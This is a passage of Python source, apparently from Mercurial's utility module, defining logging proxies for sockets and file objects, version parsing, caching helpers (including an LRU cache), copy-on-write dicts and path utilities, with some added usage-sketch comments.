670 670 orig = object.__getattribute__(self, r'_orig')
671 671 res = getattr(orig, name)(*args, **kwargs)
672 672
673 673 # Call a method on the observer of the same name with arguments
674 674 # so it can react, log, etc.
675 675 observer = object.__getattribute__(self, r'_observer')
676 676 fn = getattr(observer, name, None)
677 677 if fn:
678 678 fn(res, *args, **kwargs)
679 679
680 680 return res
681 681
682 682 def makefile(self, *args, **kwargs):
683 683 res = object.__getattribute__(self, r'_observedcall')(
684 684 r'makefile', *args, **kwargs)
685 685
686 686 # The file object may be used for I/O. So we turn it into a
687 687 # proxy using our observer.
688 688 observer = object.__getattribute__(self, r'_observer')
689 689 return makeloggingfileobject(observer.fh, res, observer.name,
690 690 reads=observer.reads,
691 691 writes=observer.writes,
692 692 logdata=observer.logdata,
693 693 logdataapis=observer.logdataapis)
694 694
695 695 def recv(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'recv', *args, **kwargs)
698 698
699 699 def recvfrom(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'recvfrom', *args, **kwargs)
702 702
703 703 def recvfrom_into(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'recvfrom_into', *args, **kwargs)
706 706
707 707 def recv_into(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'recv_into', *args, **kwargs)
710 710
711 711 def send(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'send', *args, **kwargs)
714 714
715 715 def sendall(self, *args, **kwargs):
716 716 return object.__getattribute__(self, r'_observedcall')(
717 717 r'sendall', *args, **kwargs)
718 718
719 719 def sendto(self, *args, **kwargs):
720 720 return object.__getattribute__(self, r'_observedcall')(
721 721 r'sendto', *args, **kwargs)
722 722
723 723 def setblocking(self, *args, **kwargs):
724 724 return object.__getattribute__(self, r'_observedcall')(
725 725 r'setblocking', *args, **kwargs)
726 726
727 727 def settimeout(self, *args, **kwargs):
728 728 return object.__getattribute__(self, r'_observedcall')(
729 729 r'settimeout', *args, **kwargs)
730 730
731 731 def gettimeout(self, *args, **kwargs):
732 732 return object.__getattribute__(self, r'_observedcall')(
733 733 r'gettimeout', *args, **kwargs)
734 734
735 735 def setsockopt(self, *args, **kwargs):
736 736 return object.__getattribute__(self, r'_observedcall')(
737 737 r'setsockopt', *args, **kwargs)
738 738
739 739 class baseproxyobserver(object):
740 740 def _writedata(self, data):
741 741 if not self.logdata:
742 742 if self.logdataapis:
743 743 self.fh.write('\n')
744 744 self.fh.flush()
745 745 return
746 746
747 747 # Simple case writes all data on a single line.
748 748 if b'\n' not in data:
749 749 if self.logdataapis:
750 750 self.fh.write(': %s\n' % stringutil.escapestr(data))
751 751 else:
752 752 self.fh.write('%s> %s\n'
753 753 % (self.name, stringutil.escapestr(data)))
754 754 self.fh.flush()
755 755 return
756 756
757 757 # Data with newlines is written to multiple lines.
758 758 if self.logdataapis:
759 759 self.fh.write(':\n')
760 760
761 761 lines = data.splitlines(True)
762 762 for line in lines:
763 763 self.fh.write('%s> %s\n'
764 764 % (self.name, stringutil.escapestr(line)))
765 765 self.fh.flush()
766 766
767 767 class fileobjectobserver(baseproxyobserver):
768 768 """Logs file object activity."""
769 769 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
770 770 logdataapis=True):
771 771 self.fh = fh
772 772 self.name = name
773 773 self.logdata = logdata
774 774 self.logdataapis = logdataapis
775 775 self.reads = reads
776 776 self.writes = writes
777 777
778 778 def read(self, res, size=-1):
779 779 if not self.reads:
780 780 return
781 781 # Python 3 can return None from reads at EOF instead of empty strings.
782 782 if res is None:
783 783 res = ''
784 784
785 785 if size == -1 and res == '':
786 786 # Suppress pointless read(-1) calls that return
787 787 # nothing. These happen _a lot_ on Python 3, and there
788 788 # doesn't seem to be a better workaround to have matching
789 789 # Python 2 and 3 behavior. :(
790 790 return
791 791
792 792 if self.logdataapis:
793 793 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
794 794
795 795 self._writedata(res)
796 796
797 797 def readline(self, res, limit=-1):
798 798 if not self.reads:
799 799 return
800 800
801 801 if self.logdataapis:
802 802 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
803 803
804 804 self._writedata(res)
805 805
806 806 def readinto(self, res, dest):
807 807 if not self.reads:
808 808 return
809 809
810 810 if self.logdataapis:
811 811 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
812 812 res))
813 813
814 814 data = dest[0:res] if res is not None else b''
815 815 self._writedata(data)
816 816
817 817 def write(self, res, data):
818 818 if not self.writes:
819 819 return
820 820
821 821 # Python 2 returns None from some write() calls. Python 3 (reasonably)
822 822 # returns the integer bytes written.
823 823 if res is None and data:
824 824 res = len(data)
825 825
826 826 if self.logdataapis:
827 827 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
828 828
829 829 self._writedata(data)
830 830
831 831 def flush(self, res):
832 832 if not self.writes:
833 833 return
834 834
835 835 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
836 836
837 837 # For observedbufferedinputpipe.
838 838 def bufferedread(self, res, size):
839 839 if not self.reads:
840 840 return
841 841
842 842 if self.logdataapis:
843 843 self.fh.write('%s> bufferedread(%d) -> %d' % (
844 844 self.name, size, len(res)))
845 845
846 846 self._writedata(res)
847 847
848 848 def bufferedreadline(self, res):
849 849 if not self.reads:
850 850 return
851 851
852 852 if self.logdataapis:
853 853 self.fh.write('%s> bufferedreadline() -> %d' % (
854 854 self.name, len(res)))
855 855
856 856 self._writedata(res)
857 857
858 858 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
859 859 logdata=False, logdataapis=True):
860 860 """Turn a file object into a logging file object."""
861 861
862 862 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
863 863 logdata=logdata, logdataapis=logdataapis)
864 864 return fileobjectproxy(fh, observer)
865 865
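# Usage sketch (assumption, not from the original source): wrapping a file
# object so observed reads are logged to a separate handle. 'logfh' and 'fh'
# are hypothetical open file objects.
#
#     proxy = makeloggingfileobject(logfh, fh, b'input',
#                                   reads=True, writes=False, logdata=True)
#     proxy.read(16)   # logs "input> read(16) -> 16" plus the escaped data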
866 866 class socketobserver(baseproxyobserver):
867 867 """Logs socket activity."""
868 868 def __init__(self, fh, name, reads=True, writes=True, states=True,
869 869 logdata=False, logdataapis=True):
870 870 self.fh = fh
871 871 self.name = name
872 872 self.reads = reads
873 873 self.writes = writes
874 874 self.states = states
875 875 self.logdata = logdata
876 876 self.logdataapis = logdataapis
877 877
878 878 def makefile(self, res, mode=None, bufsize=None):
879 879 if not self.states:
880 880 return
881 881
882 882 self.fh.write('%s> makefile(%r, %r)\n' % (
883 883 self.name, mode, bufsize))
884 884
885 885 def recv(self, res, size, flags=0):
886 886 if not self.reads:
887 887 return
888 888
889 889 if self.logdataapis:
890 890 self.fh.write('%s> recv(%d, %d) -> %d' % (
891 891 self.name, size, flags, len(res)))
892 892 self._writedata(res)
893 893
894 894 def recvfrom(self, res, size, flags=0):
895 895 if not self.reads:
896 896 return
897 897
898 898 if self.logdataapis:
899 899 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
900 900 self.name, size, flags, len(res[0])))
901 901
902 902 self._writedata(res[0])
903 903
904 904 def recvfrom_into(self, res, buf, size, flags=0):
905 905 if not self.reads:
906 906 return
907 907
908 908 if self.logdataapis:
909 909 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
910 910 self.name, size, flags, res[0]))
911 911
912 912 self._writedata(buf[0:res[0]])
913 913
914 914 def recv_into(self, res, buf, size=0, flags=0):
915 915 if not self.reads:
916 916 return
917 917
918 918 if self.logdataapis:
919 919 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
920 920 self.name, size, flags, res))
921 921
922 922 self._writedata(buf[0:res])
923 923
924 924 def send(self, res, data, flags=0):
925 925 if not self.writes:
926 926 return
927 927
928 928 self.fh.write('%s> send(%d, %d) -> %d' % (
929 929 self.name, len(data), flags, len(res)))
930 930 self._writedata(data)
931 931
932 932 def sendall(self, res, data, flags=0):
933 933 if not self.writes:
934 934 return
935 935
936 936 if self.logdataapis:
937 937 # Returns None on success. So don't bother reporting return value.
938 938 self.fh.write('%s> sendall(%d, %d)' % (
939 939 self.name, len(data), flags))
940 940
941 941 self._writedata(data)
942 942
943 943 def sendto(self, res, data, flagsoraddress, address=None):
944 944 if not self.writes:
945 945 return
946 946
947 947 if address:
948 948 flags = flagsoraddress
949 949 else:
950 950 flags = 0
951 951
952 952 if self.logdataapis:
953 953 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
954 954 self.name, len(data), flags, address, res))
955 955
956 956 self._writedata(data)
957 957
958 958 def setblocking(self, res, flag):
959 959 if not self.states:
960 960 return
961 961
962 962 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
963 963
964 964 def settimeout(self, res, value):
965 965 if not self.states:
966 966 return
967 967
968 968 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
969 969
970 970 def gettimeout(self, res):
971 971 if not self.states:
972 972 return
973 973
974 974 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
975 975
976 976 def setsockopt(self, res, level, optname, value):
977 977 if not self.states:
978 978 return
979 979
980 980 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
981 981 self.name, level, optname, value, res))
982 982
983 983 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
984 984 logdata=False, logdataapis=True):
985 985 """Turn a socket into a logging socket."""
986 986
987 987 observer = socketobserver(logh, name, reads=reads, writes=writes,
988 988 states=states, logdata=logdata,
989 989 logdataapis=logdataapis)
990 990 return socketproxy(fh, observer)
991 991
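# Usage sketch (assumption, not from the original source): the same idea for
# sockets, e.g. to trace what a peer connection sends. 'logfh' and 'sock' are
# hypothetical; 'sock' is a connected socket.socket instance.
#
#     proxy = makeloggingsocket(logfh, sock, b'remote',
#                               reads=True, writes=True, states=True)
#     proxy.sendall(b'hello')    # observer logs "remote> sendall(5, 0)" + data
#     proxy.recv(1024)           # observer logs "remote> recv(1024, 0) -> N"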
992 992 def version():
993 993 """Return version information if available."""
994 994 try:
995 995 from . import __version__
996 996 return __version__.version
997 997 except ImportError:
998 998 return 'unknown'
999 999
1000 1000 def versiontuple(v=None, n=4):
1001 1001 """Parses a Mercurial version string into an N-tuple.
1002 1002
1003 1003 The version string to be parsed is specified with the ``v`` argument.
1004 1004 If it isn't defined, the current Mercurial version string will be parsed.
1005 1005
1006 1006 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1007 1007 returned values:
1008 1008
1009 1009 >>> v = b'3.6.1+190-df9b73d2d444'
1010 1010 >>> versiontuple(v, 2)
1011 1011 (3, 6)
1012 1012 >>> versiontuple(v, 3)
1013 1013 (3, 6, 1)
1014 1014 >>> versiontuple(v, 4)
1015 1015 (3, 6, 1, '190-df9b73d2d444')
1016 1016
1017 1017 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1018 1018 (3, 6, 1, '190-df9b73d2d444+20151118')
1019 1019
1020 1020 >>> v = b'3.6'
1021 1021 >>> versiontuple(v, 2)
1022 1022 (3, 6)
1023 1023 >>> versiontuple(v, 3)
1024 1024 (3, 6, None)
1025 1025 >>> versiontuple(v, 4)
1026 1026 (3, 6, None, None)
1027 1027
1028 1028 >>> v = b'3.9-rc'
1029 1029 >>> versiontuple(v, 2)
1030 1030 (3, 9)
1031 1031 >>> versiontuple(v, 3)
1032 1032 (3, 9, None)
1033 1033 >>> versiontuple(v, 4)
1034 1034 (3, 9, None, 'rc')
1035 1035
1036 1036 >>> v = b'3.9-rc+2-02a8fea4289b'
1037 1037 >>> versiontuple(v, 2)
1038 1038 (3, 9)
1039 1039 >>> versiontuple(v, 3)
1040 1040 (3, 9, None)
1041 1041 >>> versiontuple(v, 4)
1042 1042 (3, 9, None, 'rc+2-02a8fea4289b')
1043 1043
1044 1044 >>> versiontuple(b'4.6rc0')
1045 1045 (4, 6, None, 'rc0')
1046 1046 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1047 1047 (4, 6, None, 'rc0+12-425d55e54f98')
1048 1048 >>> versiontuple(b'.1.2.3')
1049 1049 (None, None, None, '.1.2.3')
1050 1050 >>> versiontuple(b'12.34..5')
1051 1051 (12, 34, None, '..5')
1052 1052 >>> versiontuple(b'1.2.3.4.5.6')
1053 1053 (1, 2, 3, '.4.5.6')
1054 1054 """
1055 1055 if not v:
1056 1056 v = version()
1057 1057 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1058 1058 if not m:
1059 1059 vparts, extra = '', v
1060 1060 elif m.group(2):
1061 1061 vparts, extra = m.groups()
1062 1062 else:
1063 1063 vparts, extra = m.group(1), None
1064 1064
1065 1065 vints = []
1066 1066 for i in vparts.split('.'):
1067 1067 try:
1068 1068 vints.append(int(i))
1069 1069 except ValueError:
1070 1070 break
1071 1071 # (3, 6) -> (3, 6, None)
1072 1072 while len(vints) < 3:
1073 1073 vints.append(None)
1074 1074
1075 1075 if n == 2:
1076 1076 return (vints[0], vints[1])
1077 1077 if n == 3:
1078 1078 return (vints[0], vints[1], vints[2])
1079 1079 if n == 4:
1080 1080 return (vints[0], vints[1], vints[2], extra)
1081 1081
1082 1082 def cachefunc(func):
1083 1083 '''cache the result of function calls'''
1084 1084 # XXX doesn't handle keywords args
1085 1085 if func.__code__.co_argcount == 0:
1086 1086 cache = []
1087 1087 def f():
1088 1088 if len(cache) == 0:
1089 1089 cache.append(func())
1090 1090 return cache[0]
1091 1091 return f
1092 1092 cache = {}
1093 1093 if func.__code__.co_argcount == 1:
1094 1094 # we gain a small amount of time because
1095 1095 # we don't need to pack/unpack the list
1096 1096 def f(arg):
1097 1097 if arg not in cache:
1098 1098 cache[arg] = func(arg)
1099 1099 return cache[arg]
1100 1100 else:
1101 1101 def f(*args):
1102 1102 if args not in cache:
1103 1103 cache[args] = func(*args)
1104 1104 return cache[args]
1105 1105
1106 1106 return f
1107 1107
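# Usage sketch (not from the original source): cachefunc memoizes by positional
# arguments, so repeated calls with the same argument hit the cache.
#
#     @cachefunc
#     def _expensive(rev):
#         return compute(rev)            # hypothetical costly helper
#
#     _expensive(5)   # computed once
#     _expensive(5)   # returned from the cache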
1108 1108 class cow(object):
1109 1109 """helper class to make copy-on-write easier
1110 1110
1111 1111 Call preparewrite before doing any writes.
1112 1112 """
1113 1113
1114 1114 def preparewrite(self):
1115 1115 """call this before writes, return self or a copied new object"""
1116 1116 if getattr(self, '_copied', 0):
1117 1117 self._copied -= 1
1118 1118 return self.__class__(self)
1119 1119 return self
1120 1120
1121 1121 def copy(self):
1122 1122 """always do a cheap copy"""
1123 1123 self._copied = getattr(self, '_copied', 0) + 1
1124 1124 return self
1125 1125
1126 1126 class sortdict(collections.OrderedDict):
1127 1127 '''a simple sorted dictionary
1128 1128
1129 1129 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1130 1130 >>> d2 = d1.copy()
1131 1131 >>> d2
1132 1132 sortdict([('a', 0), ('b', 1)])
1133 1133 >>> d2.update([(b'a', 2)])
1134 1134 >>> list(d2.keys()) # should still be in last-set order
1135 1135 ['b', 'a']
1136 1136 '''
1137 1137
1138 1138 def __setitem__(self, key, value):
1139 1139 if key in self:
1140 1140 del self[key]
1141 1141 super(sortdict, self).__setitem__(key, value)
1142 1142
1143 1143 if pycompat.ispypy:
1144 1144 # __setitem__() isn't called as of PyPy 5.8.0
1145 1145 def update(self, src):
1146 1146 if isinstance(src, dict):
1147 1147 src = src.iteritems()
1148 1148 for k, v in src:
1149 1149 self[k] = v
1150 1150
1151 1151 class cowdict(cow, dict):
1152 1152 """copy-on-write dict
1153 1153
1154 1154 Be sure to call d = d.preparewrite() before writing to d.
1155 1155
1156 1156 >>> a = cowdict()
1157 1157 >>> a is a.preparewrite()
1158 1158 True
1159 1159 >>> b = a.copy()
1160 1160 >>> b is a
1161 1161 True
1162 1162 >>> c = b.copy()
1163 1163 >>> c is a
1164 1164 True
1165 1165 >>> a = a.preparewrite()
1166 1166 >>> b is a
1167 1167 False
1168 1168 >>> a is a.preparewrite()
1169 1169 True
1170 1170 >>> c = c.preparewrite()
1171 1171 >>> b is c
1172 1172 False
1173 1173 >>> b is b.preparewrite()
1174 1174 True
1175 1175 """
1176 1176
1177 1177 class cowsortdict(cow, sortdict):
1178 1178 """copy-on-write sortdict
1179 1179
1180 1180 Be sure to call d = d.preparewrite() before writing to d.
1181 1181 """
1182 1182
1183 1183 class transactional(object):
1184 1184 """Base class for making a transactional type into a context manager."""
1185 1185 __metaclass__ = abc.ABCMeta
1186 1186
1187 1187 @abc.abstractmethod
1188 1188 def close(self):
1189 1189 """Successfully closes the transaction."""
1190 1190
1191 1191 @abc.abstractmethod
1192 1192 def release(self):
1193 1193 """Marks the end of the transaction.
1194 1194
1195 1195 If the transaction has not been closed, it will be aborted.
1196 1196 """
1197 1197
1198 1198 def __enter__(self):
1199 1199 return self
1200 1200
1201 1201 def __exit__(self, exc_type, exc_val, exc_tb):
1202 1202 try:
1203 1203 if exc_type is None:
1204 1204 self.close()
1205 1205 finally:
1206 1206 self.release()
1207 1207
1208 1208 @contextlib.contextmanager
1209 1209 def acceptintervention(tr=None):
1210 1210 """A context manager that closes the transaction on InterventionRequired
1211 1211
1212 1212 If no transaction was provided, this simply runs the body and returns.
1213 1213 """
1214 1214 if not tr:
1215 1215 yield
1216 1216 return
1217 1217 try:
1218 1218 yield
1219 1219 tr.close()
1220 1220 except error.InterventionRequired:
1221 1221 tr.close()
1222 1222 raise
1223 1223 finally:
1224 1224 tr.release()
1225 1225
1226 1226 @contextlib.contextmanager
1227 1227 def nullcontextmanager():
1228 1228 yield
1229 1229
1230 1230 class _lrucachenode(object):
1231 1231 """A node in a doubly linked list.
1232 1232
1233 1233 Holds a reference to nodes on either side as well as a key-value
1234 1234 pair for the dictionary entry.
1235 1235 """
1236 1236 __slots__ = (u'next', u'prev', u'key', u'value')
1237 1237
1238 1238 def __init__(self):
1239 1239 self.next = None
1240 1240 self.prev = None
1241 1241
1242 1242 self.key = _notset
1243 1243 self.value = None
1244 1244
1245 1245 def markempty(self):
1246 1246 """Mark the node as emptied."""
1247 1247 self.key = _notset
1248 1248
1249 1249 class lrucachedict(object):
1250 1250 """Dict that caches most recent accesses and sets.
1251 1251
1252 1252 The dict consists of an actual backing dict - indexed by original
1253 1253 key - and a doubly linked circular list defining the order of entries in
1254 1254 the cache.
1255 1255
1256 1256 The head node is the newest entry in the cache. If the cache is full,
1257 1257 we recycle head.prev and make it the new head. Cache accesses result in
1258 1258 the node being moved to before the existing head and being marked as the
1259 1259 new head node.
1260 1260 """
1261 1261 def __init__(self, max):
1262 1262 self._cache = {}
1263 1263
1264 1264 self._head = head = _lrucachenode()
1265 1265 head.prev = head
1266 1266 head.next = head
1267 1267 self._size = 1
1268 1268 self._capacity = max
1269 1269
1270 1270 def __len__(self):
1271 1271 return len(self._cache)
1272 1272
1273 1273 def __contains__(self, k):
1274 1274 return k in self._cache
1275 1275
1276 1276 def __iter__(self):
1277 1277 # We don't have to iterate in cache order, but why not.
1278 1278 n = self._head
1279 1279 for i in range(len(self._cache)):
1280 1280 yield n.key
1281 1281 n = n.next
1282 1282
1283 1283 def __getitem__(self, k):
1284 1284 node = self._cache[k]
1285 1285 self._movetohead(node)
1286 1286 return node.value
1287 1287
1288 1288 def __setitem__(self, k, v):
1289 1289 node = self._cache.get(k)
1290 1290 # Replace existing value and mark as newest.
1291 1291 if node is not None:
1292 1292 node.value = v
1293 1293 self._movetohead(node)
1294 1294 return
1295 1295
1296 1296 if self._size < self._capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 del self._cache[node.key]
1305 1305
1306 1306 node.key = k
1307 1307 node.value = v
1308 1308 self._cache[k] = node
1309 1309 # And mark it as newest entry. No need to adjust order since it
1310 1310 # is already self._head.prev.
1311 1311 self._head = node
1312 1312
1313 1313 def __delitem__(self, k):
1314 1314 node = self._cache.pop(k)
1315 1315 node.markempty()
1316 1316
1317 1317 # Temporarily mark as newest item before re-adjusting head to make
1318 1318 # this node the oldest item.
1319 1319 self._movetohead(node)
1320 1320 self._head = node.next
1321 1321
1322 1322 # Additional dict methods.
1323 1323
1324 1324 def get(self, k, default=None):
1325 1325 try:
1326 1326 return self._cache[k].value
1327 1327 except KeyError:
1328 1328 return default
1329 1329
1330 1330 def clear(self):
1331 1331 n = self._head
1332 1332 while n.key is not _notset:
1333 1333 n.markempty()
1334 1334 n = n.next
1335 1335
1336 1336 self._cache.clear()
1337 1337
1338 1338 def copy(self):
1339 1339 result = lrucachedict(self._capacity)
1340 1340 n = self._head.prev
1341 1341 # Iterate in oldest-to-newest order, so the copy has the right ordering
1342 1342 for i in range(len(self._cache)):
1343 1343 result[n.key] = n.value
1344 1344 n = n.prev
1345 1345 return result
1346 1346
1347 1347 def _movetohead(self, node):
1348 1348 """Mark a node as the newest, making it the new head.
1349 1349
1350 1350 When a node is accessed, it becomes the freshest entry in the LRU
1351 1351 list, which is denoted by self._head.
1352 1352
1353 1353 Visually, let's make ``N`` the new head node (* denotes head):
1354 1354
1355 1355 previous/oldest <-> head <-> next/next newest
1356 1356
1357 1357 ----<->--- A* ---<->-----
1358 1358 | |
1359 1359 E <-> D <-> N <-> C <-> B
1360 1360
1361 1361 To:
1362 1362
1363 1363 ----<->--- N* ---<->-----
1364 1364 | |
1365 1365 E <-> D <-> C <-> B <-> A
1366 1366
1367 1367 This requires the following moves:
1368 1368
1369 1369 C.next = D (node.prev.next = node.next)
1370 1370 D.prev = C (node.next.prev = node.prev)
1371 1371 E.next = N (head.prev.next = node)
1372 1372 N.prev = E (node.prev = head.prev)
1373 1373 N.next = A (node.next = head)
1374 1374 A.prev = N (head.prev = node)
1375 1375 """
1376 1376 head = self._head
1377 1377 # C.next = D
1378 1378 node.prev.next = node.next
1379 1379 # D.prev = C
1380 1380 node.next.prev = node.prev
1381 1381 # N.prev = E
1382 1382 node.prev = head.prev
1383 1383 # N.next = A
1384 1384 # It is tempting to do just "head" here, however if node is
1385 1385 # adjacent to head, this will do bad things.
1386 1386 node.next = head.prev.next
1387 1387 # E.next = N
1388 1388 node.next.prev = node
1389 1389 # A.prev = N
1390 1390 node.prev.next = node
1391 1391
1392 1392 self._head = node
1393 1393
1394 1394 def _addcapacity(self):
1395 1395 """Add a node to the circular linked list.
1396 1396
1397 1397 The new node is inserted before the head node.
1398 1398 """
1399 1399 head = self._head
1400 1400 node = _lrucachenode()
1401 1401 head.prev.next = node
1402 1402 node.prev = head.prev
1403 1403 node.next = head
1404 1404 head.prev = node
1405 1405 self._size += 1
1406 1406 return node
1407 1407
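# Usage sketch (not from the original source): lrucachedict keeps at most 'max'
# entries, evicting the least recently accessed one when full.
#
#     cache = lrucachedict(2)
#     cache[b'a'] = 1
#     cache[b'b'] = 2
#     cache[b'a']            # touch 'a' so it becomes the newest entry
#     cache[b'c'] = 3        # evicts b'b', the least recently used key
#     assert b'b' not in cache and b'a' in cache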
1408 1408 def lrucachefunc(func):
1409 1409 '''cache most recent results of function calls'''
1410 1410 cache = {}
1411 1411 order = collections.deque()
1412 1412 if func.__code__.co_argcount == 1:
1413 1413 def f(arg):
1414 1414 if arg not in cache:
1415 1415 if len(cache) > 20:
1416 1416 del cache[order.popleft()]
1417 1417 cache[arg] = func(arg)
1418 1418 else:
1419 1419 order.remove(arg)
1420 1420 order.append(arg)
1421 1421 return cache[arg]
1422 1422 else:
1423 1423 def f(*args):
1424 1424 if args not in cache:
1425 1425 if len(cache) > 20:
1426 1426 del cache[order.popleft()]
1427 1427 cache[args] = func(*args)
1428 1428 else:
1429 1429 order.remove(args)
1430 1430 order.append(args)
1431 1431 return cache[args]
1432 1432
1433 1433 return f
1434 1434
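# Usage sketch (not from the original source): like cachefunc, but keeps only
# the ~20 most recently used results instead of growing without bound.
#
#     _compiled = lrucachefunc(remod.compile)   # caches compiled patterns
#     _compiled(br'foo.*bar')                   # compiled once
#     _compiled(br'foo.*bar')                   # served from the LRU cache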
1435 1435 class propertycache(object):
1436 1436 def __init__(self, func):
1437 1437 self.func = func
1438 1438 self.name = func.__name__
1439 1439 def __get__(self, obj, type=None):
1440 1440 result = self.func(obj)
1441 1441 self.cachevalue(obj, result)
1442 1442 return result
1443 1443
1444 1444 def cachevalue(self, obj, value):
1445 1445 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1446 1446 obj.__dict__[self.name] = value
1447 1447
1448 1448 def clearcachedproperty(obj, prop):
1449 1449 '''clear a cached property value, if one has been set'''
1450 1450 if prop in obj.__dict__:
1451 1451 del obj.__dict__[prop]
1452 1452
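# Usage sketch (not from the original source): propertycache computes a value
# on first attribute access and stores it in the instance __dict__, so later
# accesses skip the function; clearcachedproperty() invalidates it.
#
#     class repoish(object):               # hypothetical consumer
#         @propertycache
#         def branchmap(self):
#             return expensive_scan(self)  # hypothetical costly call
#
#     r = repoish()
#     r.branchmap                          # computed and cached
#     clearcachedproperty(r, 'branchmap')  # next access recomputes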
1453 1453 def increasingchunks(source, min=1024, max=65536):
1454 1454 '''return no less than min bytes per chunk while data remains,
1455 1455 doubling min after each chunk until it reaches max'''
1456 1456 def log2(x):
1457 1457 if not x:
1458 1458 return 0
1459 1459 i = 0
1460 1460 while x:
1461 1461 x >>= 1
1462 1462 i += 1
1463 1463 return i - 1
1464 1464
1465 1465 buf = []
1466 1466 blen = 0
1467 1467 for chunk in source:
1468 1468 buf.append(chunk)
1469 1469 blen += len(chunk)
1470 1470 if blen >= min:
1471 1471 if min < max:
1472 1472 min = min << 1
1473 1473 nmin = 1 << log2(blen)
1474 1474 if nmin > min:
1475 1475 min = nmin
1476 1476 if min > max:
1477 1477 min = max
1478 1478 yield ''.join(buf)
1479 1479 blen = 0
1480 1480 buf = []
1481 1481 if buf:
1482 1482 yield ''.join(buf)
1483 1483
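# Usage sketch (not from the original source): increasingchunks() rebatches an
# iterator of small chunks into progressively larger ones, which keeps the
# number of write() calls down when streaming data out.
#
#     for chunk in increasingchunks(filechunkiter(ifp)):  # ifp: open file
#         ofp.write(chunk)     # chunk sizes grow from ~1k toward 64k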
1484 1484 def always(fn):
1485 1485 return True
1486 1486
1487 1487 def never(fn):
1488 1488 return False
1489 1489
1490 1490 def nogc(func):
1491 1491 """disable garbage collector
1492 1492
1493 1493 Python's garbage collector triggers a GC each time a certain number of
1494 1494 container objects (the number being defined by gc.get_threshold()) are
1495 1495 allocated even when marked not to be tracked by the collector. Tracking has
1496 1496 no effect on when GCs are triggered, only on what objects the GC looks
1497 1497 into. As a workaround, disable GC while building complex (huge)
1498 1498 containers.
1499 1499
1500 1500 This garbage collector issue has been fixed in 2.7, but it still affects
1501 1501 CPython's performance.
1502 1502 """
1503 1503 def wrapper(*args, **kwargs):
1504 1504 gcenabled = gc.isenabled()
1505 1505 gc.disable()
1506 1506 try:
1507 1507 return func(*args, **kwargs)
1508 1508 finally:
1509 1509 if gcenabled:
1510 1510 gc.enable()
1511 1511 return wrapper
1512 1512
1513 1513 if pycompat.ispypy:
1514 1514 # PyPy runs slower with gc disabled
1515 1515 nogc = lambda x: x
1516 1516
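# Usage sketch (not from the original source): nogc is meant to decorate
# functions that build very large container structures, where cyclic-GC passes
# during construction would only add overhead.
#
#     @nogc
#     def _buildindex(entries):
#         return {e[0]: e for e in entries}   # hypothetical big dict build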
1517 1517 def pathto(root, n1, n2):
1518 1518 '''return the relative path from one place to another.
1519 1519 root should use os.sep to separate directories
1520 1520 n1 should use os.sep to separate directories
1521 1521 n2 should use "/" to separate directories
1522 1522 returns an os.sep-separated path.
1523 1523
1524 1524 If n1 is a relative path, it's assumed it's
1525 1525 relative to root.
1526 1526 n2 should always be relative to root.
1527 1527 '''
1528 1528 if not n1:
1529 1529 return localpath(n2)
1530 1530 if os.path.isabs(n1):
1531 1531 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1532 1532 return os.path.join(root, localpath(n2))
1533 1533 n2 = '/'.join((pconvert(root), n2))
1534 1534 a, b = splitpath(n1), n2.split('/')
1535 1535 a.reverse()
1536 1536 b.reverse()
1537 1537 while a and b and a[-1] == b[-1]:
1538 1538 a.pop()
1539 1539 b.pop()
1540 1540 b.reverse()
1541 1541 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1542 1542
1543 1543 # the location of data files matching the source code
1544 1544 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1545 1545 # executable version (py2exe) doesn't support __file__
1546 1546 datapath = os.path.dirname(pycompat.sysexecutable)
1547 1547 else:
1548 1548 datapath = os.path.dirname(pycompat.fsencode(__file__))
1549 1549
1550 1550 i18n.setdatapath(datapath)
1551 1551
1552 1552 def checksignature(func):
1553 1553 '''wrap a function with code to check for calling errors'''
1554 1554 def check(*args, **kwargs):
1555 1555 try:
1556 1556 return func(*args, **kwargs)
1557 1557 except TypeError:
1558 1558 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1559 1559 raise error.SignatureError
1560 1560 raise
1561 1561
1562 1562 return check
1563 1563
1564 1564 # a whitelist of known filesystems where hardlinks work reliably
1565 1565 _hardlinkfswhitelist = {
1566 1566 'apfs',
1567 1567 'btrfs',
1568 1568 'ext2',
1569 1569 'ext3',
1570 1570 'ext4',
1571 1571 'hfs',
1572 1572 'jfs',
1573 1573 'NTFS',
1574 1574 'reiserfs',
1575 1575 'tmpfs',
1576 1576 'ufs',
1577 1577 'xfs',
1578 1578 'zfs',
1579 1579 }
1580 1580
